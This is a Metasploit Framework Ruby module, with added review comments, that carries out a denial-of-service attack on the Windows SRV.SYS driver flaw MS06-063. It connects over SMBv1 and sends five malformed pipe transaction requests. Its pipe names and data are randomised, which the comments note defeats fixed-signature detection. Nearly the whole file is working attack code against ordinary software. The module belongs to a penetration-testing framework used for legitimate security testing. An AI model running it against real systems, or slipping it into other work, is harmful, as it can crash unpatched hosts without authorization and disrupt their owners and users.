
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
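# Auxiliary denial-of-service test module for the SRV.SYS NULL pointer
# dereference referenced below as CVE-2006-3942 / MS06-063.
#
# What the code does: it opens an SMBv1 session to the configured target and
# sends up to five pipe transaction requests through the SMB client's
# `trans_nonull` helper. The pipe name and the data field are random
# alphanumeric strings of 1..16 characters, so network detection for this
# traffic cannot rely on a fixed pipe name or payload string.
#
# NOTE(review): `trans_nonull` is defined in the SMB client library, not in
# this file; going by the module name it presumably builds the transaction
# without the terminating NULL on the pipe name. Confirm against the library.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Auxiliary::Dos

  # Registers module metadata (name, description, author, license and the
  # advisory references) and removes the user-selectable SMB protocol version
  # option.
  #
  # @param info [Hash] metadata overrides merged in by `update_info`
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft SRV.SYS Pipe Transaction No Null',
        'Description' => %q{
          This module exploits a NULL pointer dereference flaw in the
          SRV.SYS driver of the Windows operating system. This bug was
          independently discovered by CORE Security and ISS.
        },

        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['OSVDB', '27644' ],
          ['MSB', 'MS06-063' ],
          ['CVE', '2006-3942'],
          ['BID', '19215'],
        ]
      )
    )

    # `run` pins the connection to SMB version 1 (`connect(versions: [1])`),
    # so the protocol-version option is removed rather than left selectable.
    deregister_options('SMB::ProtocolVersion')
  end

  # Connects over SMBv1, performs the SMB login step, then sends the
  # transaction request up to five times.
  #
  # Errors raised while sending are reported with `print_error` and not
  # re-raised. An interrupt stops the loop silently. The connection is closed
  # on every exit path from the send loop.
  #
  # @return [void]
  def run
    print_status("Connecting to the target system...")

    # Errors from connect/smb_login are not rescued here and propagate to the
    # caller, as in the original flow.
    connect(versions: [1])
    smb_login

    begin
      1.upto(5) do |i|
        print_status("Sending bad SMB transaction request #{i}...")
        self.simple.client.trans_nonull(
          # Random pipe name with a leading backslash, 1..16 characters.
          "\\#{Rex::Text.rand_text_alphanumeric(rand(16)+1)}",
          '',
          # Random data, 1..16 characters.
          Rex::Text.rand_text_alphanumeric(rand(16)+1),
          3,
          # Three 16-bit little-endian words: 1, 0, 1.
          [1,0,1].pack('vvv'),
          true
        )
      end
    rescue ::Interrupt
      return
    # NOTE(review): rescuing ::Exception also catches non-StandardError
    # failures. Narrowing it to ::StandardError needs a check of the SMB/Rex
    # exception hierarchy, which is not visible in this file.
    rescue ::Exception => e
      print_error("Error: #{e.class} > #{e}")
    ensure
      # Previously `disconnect` was skipped when the loop was interrupted
      # (the `return` above), leaving the socket open. `ensure` closes it on
      # success, on a reported error and on interrupt alike.
      disconnect
    end
  end
end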